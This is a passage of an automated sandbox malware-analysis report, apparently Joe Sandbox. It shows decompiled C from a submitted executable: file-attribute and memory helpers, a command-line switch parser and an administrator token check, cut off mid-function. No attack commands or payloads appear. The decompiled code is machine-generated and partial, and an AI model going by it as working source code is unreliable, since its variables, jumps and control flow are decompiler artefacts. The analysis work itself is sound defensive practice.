                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: 30563ae3cbabb56b0ec2f4166e5f805441b7c4649304728076f5cc0b51cdccd1
                              • Instruction ID: c7ba197bcc2132f7268aa845f62ac84d73f6853271aa91bbbc14ddbf1f7a6f80
                              • Opcode Fuzzy Hash: 30563ae3cbabb56b0ec2f4166e5f805441b7c4649304728076f5cc0b51cdccd1
                              • Instruction Fuzzy Hash: 2DF01231508B09AE4771EE2FCC0469ABBE6AAD52603108A2F96EED2150E7326451EB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E66AE(CHAR* __ecx) {
                              				unsigned int _t1;
                              
                              				_t1 = GetFileAttributesA(__ecx); // executed
                              				if(_t1 != 0xffffffff) {
                              					return  !(_t1 >> 4) & 0x00000001;
                              				} else {
                              					return 0;
                              				}
                              			}




                              0x010e66b1
                              0x010e66ba
                              0x010e66c7
                              0x010e66bc
                              0x010e66be
                              0x010e66be

                              APIs
                              • GetFileAttributesA.KERNELBASE(?,010E4777,?,010E4E38,?), ref: 010E66B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 06aa061500e28b9829644265fb07ccb9a3a8fbd95dfbe09d9b81d1dfbdd9bd03
                              • Instruction ID: ffd0b99994ef6290eae1a293619863751dde55230216a18d774198c9ede6c646
                              • Opcode Fuzzy Hash: 06aa061500e28b9829644265fb07ccb9a3a8fbd95dfbe09d9b81d1dfbdd9bd03
                              • Instruction Fuzzy Hash: 46B09276232440866A611636782955628C1A6C563ABE52B91F072C11D4CA3FD546D504
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E4CA0(long _a4) {
                              				void* _t2;
                              
                              				_t2 = GlobalAlloc(0, _a4); // executed
                              				return _t2;
                              			}




                              0x010e4caa
                              0x010e4cb1

                              APIs
                              • GlobalAlloc.KERNELBASE(00000000,?), ref: 010E4CAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: AllocGlobal
                              • String ID:
                              • API String ID: 3761449716-0
                              • Opcode ID: 05ee9cdf5216ee9352b41dc3e9404c031c78feae1ec3d7569a71be86cc67eddd
                              • Instruction ID: b2ec98124c7ca023bcd8908504b16c9d46b3bf3390fdd05d8bca199a594103ce
                              • Opcode Fuzzy Hash: 05ee9cdf5216ee9352b41dc3e9404c031c78feae1ec3d7569a71be86cc67eddd
                              • Instruction Fuzzy Hash: ABB0123314420CF7CF101EC3E809F853F5DE7C8B61F150000F60C4A0408A7795108795
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E4CC0(void* _a4) {
                              				void* _t2;
                              
                              				_t2 = GlobalFree(_a4); // executed
                              				return _t2;
                              			}




                              0x010e4cc8
                              0x010e4ccf

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: FreeGlobal
                              • String ID:
                              • API String ID: 2979337801-0
                              • Opcode ID: 098f025b5c914edee307f7b163346ec93f764747e64aef05dec8a93621d5d681
                              • Instruction ID: 89846b3abdaae744b0e51e7ab2470597cf8d385939833bc7a2d7408c655d6ef5
                              • Opcode Fuzzy Hash: 098f025b5c914edee307f7b163346ec93f764747e64aef05dec8a93621d5d681
                              • Instruction Fuzzy Hash: 5EB0123100010CF78F101A43E8088453F5DD6C47707000010F50C460118B3B98118684
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E010E5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				signed int _v12;
                              				CHAR* _v265;
                              				char _v266;
                              				char _v267;
                              				char _v268;
                              				CHAR* _v272;
                              				char _v276;
                              				signed int _v296;
                              				char _v556;
                              				signed int _t61;
                              				int _t63;
                              				char _t67;
                              				CHAR* _t69;
                              				signed int _t71;
                              				void* _t75;
                              				char _t79;
                              				void* _t83;
                              				void* _t85;
                              				void* _t87;
                              				intOrPtr _t88;
                              				void* _t100;
                              				intOrPtr _t101;
                              				CHAR* _t104;
                              				intOrPtr _t105;
                              				void* _t111;
                              				void* _t115;
                              				CHAR* _t118;
                              				void* _t119;
                              				void* _t127;
                              				CHAR* _t129;
                              				void* _t132;
                              				void* _t142;
                              				signed int _t143;
                              				CHAR* _t144;
                              				void* _t145;
                              				void* _t146;
                              				void* _t147;
                              				void* _t149;
                              				char _t155;
                              				void* _t157;
                              				void* _t162;
                              				void* _t163;
                              				char _t167;
                              				char _t170;
                              				CHAR* _t173;
                              				void* _t177;
                              				intOrPtr* _t183;
                              				intOrPtr* _t192;
                              				CHAR* _t199;
                              				void* _t200;
                              				CHAR* _t201;
                              				void* _t205;
                              				void* _t206;
                              				int _t209;
                              				void* _t210;
                              				void* _t212;
                              				void* _t213;
                              				CHAR* _t218;
                              				intOrPtr* _t219;
                              				intOrPtr* _t220;
                              				signed int _t221;
                              				signed int _t223;
                              
                              				_t173 = __ecx;
                              				_t61 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t61 ^ _t221;
                              				_push(__ebx);
                              				_push(__esi);
                              				_push(__edi);
                              				_t209 = 1;
                              				if(__ecx == 0 ||  *__ecx == 0) {
                              					_t63 = 1;
                              				} else {
                              					L2:
                              					while(_t209 != 0) {
                              						_t67 =  *_t173;
                              						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                              							_t173 = CharNextA(_t173);
                              							continue;
                              						}
                              						_v272 = _t173;
                              						if(_t67 == 0) {
                              							break;
                              						} else {
                              							_t69 = _v272;
                              							_t177 = 0;
                              							_t213 = 0;
                              							_t163 = 0;
                              							_t202 = 1;
                              							do {
                              								if(_t213 != 0) {
                              									if(_t163 != 0) {
                              										break;
                              									} else {
                              										goto L21;
                              									}
                              								} else {
                              									_t69 =  *_t69;
                              									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                              										break;
                              									} else {
                              										_t69 = _v272;
                              										L21:
                              										_t155 =  *_t69;
                              										if(_t155 != 0x22) {
                              											if(_t202 >= 0x104) {
                              												goto L106;
                              											} else {
                              												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                              												_t177 = _t177 + 1;
                              												_t202 = _t202 + 1;
                              												_t157 = 1;
                              												goto L30;
                              											}
                              										} else {
                              											if(_v272[1] == 0x22) {
                              												if(_t202 >= 0x104) {
                              													L106:
                              													_t63 = 0;
                              													L125:
                              													_pop(_t210);
                              													_pop(_t212);
                              													_pop(_t162);
                              													return E010E6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                              												} else {
                              													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                              													_t177 = _t177 + 1;
                              													_t202 = _t202 + 1;
                              													_t157 = 2;
                              													goto L30;
                              												}
                              											} else {
                              												_t157 = 1;
                              												if(_t213 != 0) {
                              													_t163 = 1;
                              												} else {
                              													_t213 = 1;
                              												}
                              												goto L30;
                              											}
                              										}
                              									}
                              								}
                              								goto L131;
                              								L30:
                              								_v272 =  &(_v272[_t157]);
                              								_t69 = _v272;
                              							} while ( *_t69 != 0);
                              							if(_t177 >= 0x104) {
                              								E010E6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                              								asm("int3");
                              								_push(_t221);
                              								_t222 = _t223;
                              								_t71 =  *0x10e8004; // 0x9fdbf5b5
                              								_v296 = _t71 ^ _t223;
                              								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                              									0x4f0 = 2;
                              									_t75 = E010E597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                              								} else {
                              									E010E44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                              									 *0x10e9124 = E010E6285();
                              									_t75 = 0;
                              								}
                              								return E010E6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                              							} else {
                              								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                              								if(_t213 == 0) {
                              									if(_t163 != 0) {
                              										goto L34;
                              									} else {
                              										goto L40;
                              									}
                              								} else {
                              									if(_t163 != 0) {
                              										L40:
                              										_t79 = _v268;
                              										if(_t79 == 0x2f || _t79 == 0x2d) {
                              											_t83 = CharUpperA(_v267) - 0x3f;
                              											if(_t83 == 0) {
                              												_t202 = 0x521;
                              												E010E44B9(0, 0x521, 0x10e1140, 0, 0x40, 0);
                              												_t85 =  *0x10e8588; // 0x0
                              												if(_t85 != 0) {
                              													CloseHandle(_t85);
                              												}
                              												ExitProcess(0);
                              											}
                              											_t87 = _t83 - 4;
                              											if(_t87 == 0) {
                              												if(_v266 != 0) {
                              													if(_v266 != 0x3a) {
                              														goto L49;
                              													} else {
                              														_t167 = (0 | _v265 == 0x00000022) + 3;
                              														_t215 =  &_v268 + _t167;
                              														_t183 =  &_v268 + _t167;
                              														_t50 = _t183 + 1; // 0x1
                              														_t202 = _t50;
                              														do {
                              															_t88 =  *_t183;
                              															_t183 = _t183 + 1;
                              														} while (_t88 != 0);
                              														if(_t183 == _t202) {
                              															goto L49;
                              														} else {
                              															_t205 = 0x5b;
                              															if(E010E667F(_t215, _t205) == 0) {
                              																L115:
                              																_t206 = 0x5d;
                              																if(E010E667F(_t215, _t206) == 0) {
                              																	L117:
                              																	_t202 =  &_v276;
                              																	_v276 = _t167;
                              																	if(E010E5C17(_t215,  &_v276) == 0) {
                              																		goto L49;
                              																	} else {
                              																		_t202 = 0x104;
                              																		E010E1680(0x10e8c42, 0x104, _v276 + _t167 +  &_v268);
                              																	}
                              																} else {
                              																	_t202 = 0x5b;
                              																	if(E010E667F(_t215, _t202) == 0) {
                              																		goto L49;
                              																	} else {
                              																		goto L117;
                              																	}
                              																}
                              															} else {
                              																_t202 = 0x5d;
                              																if(E010E667F(_t215, _t202) == 0) {
                              																	goto L49;
                              																} else {
                              																	goto L115;
                              																}
                              															}
                              														}
                              													}
                              												} else {
                              													 *0x10e8a24 = 1;
                              												}
                              												goto L50;
                              											} else {
                              												_t100 = _t87 - 1;
                              												if(_t100 == 0) {
                              													L98:
                              													if(_v266 != 0x3a) {
                              														goto L49;
                              													} else {
                              														_t170 = (0 | _v265 == 0x00000022) + 3;
                              														_t217 =  &_v268 + _t170;
                              														_t192 =  &_v268 + _t170;
                              														_t38 = _t192 + 1; // 0x1
                              														_t202 = _t38;
                              														do {
                              															_t101 =  *_t192;
                              															_t192 = _t192 + 1;
                              														} while (_t101 != 0);
                              														if(_t192 == _t202) {
                              															goto L49;
                              														} else {
                              															_t202 =  &_v276;
                              															_v276 = _t170;
                              															if(E010E5C17(_t217,  &_v276) == 0) {
                              																goto L49;
                              															} else {
                              																_t104 = CharUpperA(_v267);
                              																_t218 = 0x10e8b3e;
                              																_t105 = _v276;
                              																if(_t104 != 0x54) {
                              																	_t218 = 0x10e8a3a;
                              																}
                              																E010E1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                              																_t202 = 0x104;
                              																E010E658A(_t218, 0x104, 0x10e1140);
                              																if(E010E31E0(_t218) != 0) {
                              																	goto L50;
                              																} else {
                              																	goto L106;
                              																}
                              															}
                              														}
                              													}
                              												} else {
                              													_t111 = _t100 - 0xa;
                              													if(_t111 == 0) {
                              														if(_v266 != 0) {
                              															if(_v266 != 0x3a) {
                              																goto L49;
                              															} else {
                              																_t199 = _v265;
                              																if(_t199 != 0) {
                              																	_t219 =  &_v265;
                              																	do {
                              																		_t219 = _t219 + 1;
                              																		_t115 = CharUpperA(_t199) - 0x45;
                              																		if(_t115 == 0) {
                              																			 *0x10e8a2c = 1;
                              																		} else {
                              																			_t200 = 2;
                              																			_t119 = _t115 - _t200;
                              																			if(_t119 == 0) {
                              																				 *0x10e8a30 = 1;
                              																			} else {
                              																				if(_t119 == 0xf) {
                              																					 *0x10e8a34 = 1;
                              																				} else {
                              																					_t209 = 0;
                              																				}
                              																			}
                              																		}
                              																		_t118 =  *_t219;
                              																		_t199 = _t118;
                              																	} while (_t118 != 0);
                              																}
                              															}
                              														} else {
                              															 *0x10e8a2c = 1;
                              														}
                              														goto L50;
                              													} else {
                              														_t127 = _t111 - 3;
                              														if(_t127 == 0) {
                              															if(_v266 != 0) {
                              																if(_v266 != 0x3a) {
                              																	goto L49;
                              																} else {
                              																	_t129 = CharUpperA(_v265);
                              																	if(_t129 == 0x31) {
                              																		goto L76;
                              																	} else {
                              																		if(_t129 == 0x41) {
                              																			goto L83;
                              																		} else {
                              																			if(_t129 == 0x55) {
                              																				goto L76;
                              																			} else {
                              																				goto L49;
                              																			}
                              																		}
                              																	}
                              																}
                              															} else {
                              																L76:
                              																_push(2);
                              																_pop(1);
                              																L83:
                              																 *0x10e8a38 = 1;
                              															}
                              															goto L50;
                              														} else {
                              															_t132 = _t127 - 1;
                              															if(_t132 == 0) {
                              																if(_v266 != 0) {
                              																	if(_v266 != 0x3a) {
                              																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                              																			goto L49;
                              																		}
                              																	} else {
                              																		_t201 = _v265;
                              																		 *0x10e9a2c = 1;
                              																		if(_t201 != 0) {
                              																			_t220 =  &_v265;
                              																			do {
                              																				_t220 = _t220 + 1;
                              																				_t142 = CharUpperA(_t201) - 0x41;
                              																				if(_t142 == 0) {
                              																					_t143 = 2;
                              																					 *0x10e9a2c =  *0x10e9a2c | _t143;
                              																					goto L70;
                              																				} else {
                              																					_t145 = _t142 - 3;
                              																					if(_t145 == 0) {
                              																						 *0x10e8d48 =  *0x10e8d48 | 0x00000040;
                              																					} else {
                              																						_t146 = _t145 - 5;
                              																						if(_t146 == 0) {
                              																							 *0x10e9a2c =  *0x10e9a2c & 0xfffffffd;
                              																							goto L70;
                              																						} else {
                              																							_t147 = _t146 - 5;
                              																							if(_t147 == 0) {
                              																								 *0x10e9a2c =  *0x10e9a2c & 0xfffffffe;
                              																								goto L70;
                              																							} else {
                              																								_t149 = _t147;
                              																								if(_t149 == 0) {
                              																									 *0x10e8d48 =  *0x10e8d48 | 0x00000080;
                              																								} else {
                              																									if(_t149 == 3) {
                              																										 *0x10e9a2c =  *0x10e9a2c | 0x00000004;
                              																										L70:
                              																										 *0x10e8a28 = 1;
                              																									} else {
                              																										_t209 = 0;
                              																									}
                              																								}
                              																							}
                              																						}
                              																					}
                              																				}
                              																				_t144 =  *_t220;
                              																				_t201 = _t144;
                              																			} while (_t144 != 0);
                              																		}
                              																	}
                              																} else {
                              																	 *0x10e9a2c = 3;
                              																	 *0x10e8a28 = 1;
                              																}
                              																goto L50;
                              															} else {
                              																if(_t132 == 0) {
                              																	goto L98;
                              																} else {
                              																	L49:
                              																	_t209 = 0;
                              																	L50:
                              																	_t173 = _v272;
                              																	if( *_t173 != 0) {
                              																		goto L2;
                              																	} else {
                              																		break;
                              																	}
                              																}
                              															}
                              														}
                              													}
                              												}
                              											}
                              										} else {
                              											goto L106;
                              										}
                              									} else {
                              										L34:
                              										_t209 = 0;
                              										break;
                              									}
                              								}
                              							}
                              						}
                              						goto L131;
                              					}
                              					if( *0x10e8a2c != 0 &&  *0x10e8b3e == 0) {
                              						if(GetModuleFileNameA( *0x10e9a3c, 0x10e8b3e, 0x104) == 0) {
                              							_t209 = 0;
                              						} else {
                              							_t202 = 0x5c;
                              							 *((char*)(E010E66C8(0x10e8b3e, _t202) + 1)) = 0;
                              						}
                              					}
                              					_t63 = _t209;
                              				}
                              				L131:
                              			}


































































                              0x010e5c9e
                              0x010e5ca9
                              0x010e5cb0
                              0x010e5cb3
                              0x010e5cb6
                              0x010e5cb7
                              0x010e5cb8
                              0x010e5cbd
                              0x010e6204
                              0x010e5ccb
                              0x00000000
                              0x010e5ccb
                              0x010e5cd3
                              0x010e5cd7
                              0x010e5cf4
                              0x00000000
                              0x010e5cf4
                              0x010e5cf8
                              0x010e5d00
                              0x00000000
                              0x010e5d06
                              0x010e5d06
                              0x010e5d0e
                              0x010e5d10
                              0x010e5d12
                              0x010e5d14
                              0x010e5d15
                              0x010e5d17
                              0x010e5d49
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e5d19
                              0x010e5d19
                              0x010e5d1d
                              0x00000000
                              0x010e5d3f
                              0x010e5d3f
                              0x010e5d4b
                              0x010e5d4b
                              0x010e5d4f
                              0x010e5d8d
                              0x00000000
                              0x010e5d93
                              0x010e5d93
                              0x010e5d9a
                              0x010e5d9d
                              0x010e5d9e
                              0x00000000
                              0x010e5d9e
                              0x010e5d51
                              0x010e5d5b
                              0x010e5d72
                              0x010e60fb
                              0x010e60fb
                              0x010e6207
                              0x010e620a
                              0x010e620b
                              0x010e620e
                              0x010e6217
                              0x010e5d78
                              0x010e5d78
                              0x010e5d80
                              0x010e5d83
                              0x010e5d84
                              0x00000000
                              0x010e5d84
                              0x010e5d5d
                              0x010e5d5f
                              0x010e5d62
                              0x010e5d68
                              0x010e5d64
                              0x010e5d64
                              0x010e5d64
                              0x00000000
                              0x010e5d62
                              0x010e5d5b
                              0x010e5d4f
                              0x010e5d1d
                              0x00000000
                              0x010e5d9f
                              0x010e5d9f
                              0x010e5da5
                              0x010e5dab
                              0x010e5dba
                              0x010e6218
                              0x010e621d
                              0x010e6220
                              0x010e6221
                              0x010e6229
                              0x010e6230
                              0x010e6247
                              0x010e626a
                              0x010e6272
                              0x010e6249
                              0x010e6255
                              0x010e625f
                              0x010e6264
                              0x010e6264
                              0x010e6284
                              0x010e5dc0
                              0x010e5dc0
                              0x010e5dca
                              0x010e5e22
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e5dcc
                              0x010e5dce
                              0x010e5e24
                              0x010e5e24
                              0x010e5e2c
                              0x010e5e47
                              0x010e5e4a
                              0x010e61d2
                              0x010e61e2
                              0x010e61e7
                              0x010e61ee
                              0x010e61f1
                              0x010e61f1
                              0x010e61f8
                              0x010e61f8
                              0x010e5e50
                              0x010e5e53
                              0x010e6109
                              0x010e611f
                              0x00000000
                              0x010e6125
                              0x010e6137
                              0x010e613a
                              0x010e613c
                              0x010e613e
                              0x010e613e
                              0x010e6141
                              0x010e6141
                              0x010e6143
                              0x010e6144
                              0x010e614a
                              0x00000000
                              0x010e6150
                              0x010e6152
                              0x010e615c
                              0x010e6170
                              0x010e6172
                              0x010e617c
                              0x010e6190
                              0x010e6190
                              0x010e6196
                              0x010e61a5
                              0x00000000
                              0x010e61ab
                              0x010e61b9
                              0x010e61c6
                              0x010e61c6
                              0x010e617e
                              0x010e6180
                              0x010e618a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e618a
                              0x010e615e
                              0x010e6160
                              0x010e616a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e616a
                              0x010e615c
                              0x010e614a
                              0x010e610b
                              0x010e610e
                              0x010e610e
                              0x00000000
                              0x010e5e59
                              0x010e5e59
                              0x010e5e5c
                              0x010e604f
                              0x010e6056
                              0x00000000
                              0x010e605c
                              0x010e606e
                              0x010e6071
                              0x010e6073
                              0x010e6075
                              0x010e6075
                              0x010e6078
                              0x010e6078
                              0x010e607a
                              0x010e607b
                              0x010e6081
                              0x00000000
                              0x010e6087
                              0x010e6087
                              0x010e608d
                              0x010e609c
                              0x00000000
                              0x010e60a2
                              0x010e60aa
                              0x010e60b2
                              0x010e60b7
                              0x010e60bd
                              0x010e60bf
                              0x010e60bf
                              0x010e60d6
                              0x010e60e0
                              0x010e60e7
                              0x010e60f5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e60f5
                              0x010e609c
                              0x010e6081
                              0x010e5e62
                              0x010e5e62
                              0x010e5e65
                              0x010e5fd3
                              0x010e5fe9
                              0x00000000
                              0x010e5fef
                              0x010e5fef
                              0x010e5ff7
                              0x010e5ffd
                              0x010e6003
                              0x010e6006
                              0x010e6011
                              0x010e6014
                              0x010e603d
                              0x010e6016
                              0x010e6018
                              0x010e6019
                              0x010e601b
                              0x010e6033
                              0x010e601d
                              0x010e6020
                              0x010e6029
                              0x010e6022
                              0x010e6022
                              0x010e6022
                              0x010e6020
                              0x010e601b
                              0x010e6042
                              0x010e6044
                              0x010e6046
                              0x010e604a
                              0x010e5ff7
                              0x010e5fd5
                              0x010e5fd8
                              0x010e5fd8
                              0x00000000
                              0x010e5e6b
                              0x010e5e6b
                              0x010e5e6e
                              0x010e5f8b
                              0x010e5f99
                              0x00000000
                              0x010e5f9f
                              0x010e5fa7
                              0x010e5faf
                              0x00000000
                              0x010e5fb1
                              0x010e5fb3
                              0x00000000
                              0x010e5fb5
                              0x010e5fb7
                              0x00000000
                              0x010e5fb9
                              0x00000000
                              0x010e5fb9
                              0x010e5fb7
                              0x010e5fb3
                              0x010e5faf
                              0x010e5f8d
                              0x010e5f8d
                              0x010e5f8d
                              0x010e5f8f
                              0x010e5fc1
                              0x010e5fc1
                              0x010e5fc1
                              0x00000000
                              0x010e5e74
                              0x010e5e74
                              0x010e5e77
                              0x010e5ea0
                              0x010e5ebd
                              0x010e5f79
                              0x00000000
                              0x010e5f7f
                              0x010e5ec3
                              0x010e5ec3
                              0x010e5ecc
                              0x010e5ed4
                              0x010e5ed6
                              0x010e5edc
                              0x010e5edf
                              0x010e5eea
                              0x010e5eed
                              0x010e5f3f
                              0x010e5f40
                              0x00000000
                              0x010e5eef
                              0x010e5eef
                              0x010e5ef2
                              0x010e5f34
                              0x010e5ef4
                              0x010e5ef4
                              0x010e5ef7
                              0x010e5f2b
                              0x00000000
                              0x010e5ef9
                              0x010e5ef9
                              0x010e5efc
                              0x010e5f22
                              0x00000000
                              0x010e5efe
                              0x010e5eff
                              0x010e5f02
                              0x010e5f16
                              0x010e5f04
                              0x010e5f07
                              0x010e5f0d
                              0x010e5f46
                              0x010e5f46
                              0x010e5f09
                              0x010e5f09
                              0x010e5f09
                              0x010e5f07
                              0x010e5f02
                              0x010e5efc
                              0x010e5ef7
                              0x010e5ef2
                              0x010e5f4c
                              0x010e5f4e
                              0x010e5f50
                              0x010e5f54
                              0x010e5ed4
                              0x010e5ea2
                              0x010e5ea4
                              0x010e5eaf
                              0x010e5eaf
                              0x00000000
                              0x010e5e79
                              0x010e5e7d
                              0x00000000
                              0x010e5e83
                              0x010e5e83
                              0x010e5e83
                              0x010e5e85
                              0x010e5e85
                              0x010e5e8e
                              0x00000000
                              0x010e5e94
                              0x00000000
                              0x010e5e94
                              0x010e5e8e
                              0x010e5e7d
                              0x010e5e77
                              0x010e5e6e
                              0x010e5e65
                              0x010e5e5c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e5dd0
                              0x010e5dd0
                              0x010e5dd0
                              0x00000000
                              0x010e5dd0
                              0x010e5dce
                              0x010e5dca
                              0x010e5dba
                              0x00000000
                              0x010e5d00
                              0x010e5dd9
                              0x010e5e04
                              0x010e61fe
                              0x010e5e0a
                              0x010e5e0c
                              0x010e5e17
                              0x010e5e17
                              0x010e5e04
                              0x010e6200
                              0x010e6200
                              0x00000000

                              APIs
                              • CharNextA.USER32(?,00000000,?,?), ref: 010E5CEE
                              • GetModuleFileNameA.KERNEL32(010E8B3E,00000104,00000000,?,?), ref: 010E5DFC
                              • CharUpperA.USER32(?), ref: 010E5E3E
                              • CharUpperA.USER32(-00000052), ref: 010E5EE1
                              • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 010E5F6F
                              • CharUpperA.USER32(?), ref: 010E5FA7
                              • CharUpperA.USER32(-0000004E), ref: 010E6008
                              • CharUpperA.USER32(?), ref: 010E60AA
                              • CloseHandle.KERNEL32(00000000,010E1140,00000000,00000040,00000000), ref: 010E61F1
                              • ExitProcess.KERNEL32 ref: 010E61F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                              • String ID: "$"$:$RegServer
                              • API String ID: 1203814774-25366791
                              • Opcode ID: 06a37dbc6bb3dd23bdb3db9383eb83fefdb1bab402b54d24f447a1368cf0905a
                              • Instruction ID: 4d1d7668cb53b73fbf899846024cc30998f6d7bad23f86839eee7e095a2f5fe3
                              • Opcode Fuzzy Hash: 06a37dbc6bb3dd23bdb3db9383eb83fefdb1bab402b54d24f447a1368cf0905a
                              • Instruction Fuzzy Hash: 29D17035A082555EEFBA8A3F9C4C3FA3FF19B1530CF0849DAD5D6DA145D67689828F00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E010E18A3(void* __edx, void* __esi) {
                              				signed int _v8;
                              				short _v12;
                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                              				char _v20;
                              				long _v24;
                              				void* _v28;
                              				void* _v32;
                              				void* __ebx;
                              				void* __edi;
                              				signed int _t23;
                              				long _t45;
                              				void* _t49;
                              				int _t50;
                              				void* _t52;
                              				signed int _t53;
                              
                              				_t51 = __esi;
                              				_t49 = __edx;
                              				_t23 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t23 ^ _t53;
                              				_t25 =  *0x10e8128; // 0x2
                              				_t45 = 0;
                              				_v12 = 0x500;
                              				_t50 = 2;
                              				_v16.Value = 0;
                              				_v20 = 0;
                              				if(_t25 != _t50) {
                              					L20:
                              					return E010E6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                              				}
                              				if(E010E17EE( &_v20) != 0) {
                              					_t25 = _v20;
                              					if(_v20 != 0) {
                              						 *0x10e8128 = 1;
                              					}
                              					goto L20;
                              				}
                              				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                              					goto L20;
                              				}
                              				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                              					L17:
                              					CloseHandle(_v28);
                              					_t25 = _v20;
                              					goto L20;
                              				} else {
                              					_push(__esi);
                              					_t52 = LocalAlloc(0, _v24);
                              					if(_t52 == 0) {
                              						L16:
                              						_pop(_t51);
                              						goto L17;
                              					}
                              					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                              						L15:
                              						LocalFree(_t52);
                              						goto L16;
                              					} else {
                              						if( *_t52 <= 0) {
                              							L14:
                              							FreeSid(_v32);
                              							goto L15;
                              						}
                              						_t15 = _t52 + 4; // 0x4
                              						_t50 = _t15;
